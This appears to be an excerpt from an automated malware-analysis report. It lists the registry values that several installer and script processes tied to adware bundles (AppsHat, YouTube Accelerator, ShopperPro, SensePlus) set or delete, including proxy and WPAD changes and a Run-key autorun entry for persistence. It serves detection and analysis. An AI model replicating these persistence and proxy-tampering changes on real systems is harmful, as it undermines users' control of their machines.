[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"Publisher" = "Somoto Ltd."
"DisplayVersion" = "1.0.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\Uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat]

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process DCytaiesmt_smtyc_setup.exe:1064 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionTime" = "BD 93 66 54 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "7E D3 27 51 30 7A D0 01"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TimeStamp" = "1429400145"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TimeLimit" = "1"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Success]
"InstallStr" = "ok"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TraceLevel" = "3"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TracerDoBackup" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4B 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Success]
"Install" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TraceDestination" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process DCytaiesmt_smtyc_setup.exe:3856 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "A3 2D CE 5F 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 50 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

"WpadDecisionTime" = "CF 09 4B 61 30 7A D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process DCytaiesmt_smtyc_setup.exe:392 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "7E D3 27 51 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4A 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

"WpadDecisionTime" = "E7 62 A3 53 30 7A D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process DCytaiesmt_smtyc_setup.exe:3172 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "D8 35 97 61 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 53 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

"WpadDecisionTime" = "02 C1 85 63 30 7A D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process DCytaiesmt_smtyc_setup.exe:2512 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "D8 35 97 61 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 54 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

"WpadDecisionTime" = "E5 B2 A4 63 30 7A D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process DCytaiesmt_smtyc_setup.exe:3640 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "31 F3 1C 5E 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4F 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

"WpadDecisionTime" = "8B B6 29 61 30 7A D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process cscript.exe:1372 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "D1 BA 90 83 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat]
"DisplayVersion" = "2.13"
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\icons\tray.ico"

"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\uninstall.exe _?=C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat"
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat]
"DisplayName" = "AppsHat"
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 60 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\WebPlayer]
"AppsHat" = "1"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"AppsHat" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process spbiu.exe:3496 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\ShopperPro\SPBIUpd]
"Gcf" = "D9 91 CF EC EE 40 F4 7E 74 E4 CF FB 2F 99 75 C3"

[HKLM\SOFTWARE\ShopperPro\SPBIUpd\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

[HKLM\SOFTWARE\ShopperPro\SPBIUpd]
"Scf" = "9C 6A 92 53 58 94 FC CB 9D 8E 86 F3 A2 A7 82 C8"

The process spbiu.exe:960 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\ShopperPro\SPBIUpd]
"Ult" = "Type: REG_QWORD, Length: 8"

The process wscript.exe:4912 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Malware deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process 19fa6da2-7e70-4168-ae8d-59d51e43be31-4.exe:4452 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\SensePlus\Sxuc s6UHdkkBMI3TPbMDdOjupuw7F18Q7PshVRAk FZxDEu/apwrp/9MdF8gTh0dCgXajutsY2KOoFd bv1IitpbTes0RLNENToBGpPazaoliQi1tkegTAcOIGyiV3QRp6V6OquZlyL /e6vfFjGnQ2gaaJ1Jlo4GCXzibNflw=]
"llN1Jcd35X4oPnbdFkuoaACNUqQF3snJnuz/hEY7eN/KVqlSiUdbHUs0LaqrObNekoMAj 6UjKIgs U8d5qa1I/EEhPonbr1w3ffKbLitE1rN/cC9quJsxaJcPzDykUgzwFqrF/ Gzt 478ht9jhE3pvsTEzQ23gIYgcxI94mLs=" = "1"

[HKLM\SOFTWARE\Wow6432Node\Tempo]
"(Default)" = "tempo"

[HKLM\SOFTWARE\Wow6432Node\SensePlus\U/mwtMJQRCKR0dU2rxQ4oph6X45x6O83/tPa4qzbRFFQlpD8vi6EOqZi22NegCITusO1G3TtiH4LD Z8Lxftub6x5B8oXx7BwmBtVZA3jXV8s 2z06x6XpZkQN/5ATUtsPzEooip2Zh6xCXLYw dv uJG8jyegsaBUbTRn9nZDo=]
"Ul0n1X03IbQ6xiPBCEDslxZ9fsRrLJ/vqSZLr9gZ0O KUCestLVRWje2vR4RIlDDKH6ZKOwvlLyt17ra1z7xzZbKWwqNFFUjlmufcqRV4ch2iTPwfFjrdfz6c e4uUdC3qjqU0STqs6kBy2ggedKg6oa4w0h8SvBpRP2bxSQ61k=" = "1"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Wow6432Node\Tempo]

The process taskeng.exe:3412 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Handshake\{9490D44E-61F5-422C-86D2-A76E483B3C9F}]
"data" = "4D 45 4F 57 01 00 00 00 E4 B7 BD 92 8B F2 A0 46"

The process ytaiesmt_smtyc_setup.exe:2128 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\install20087.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\DCytaiesmt_smtyc_setup.exe,"

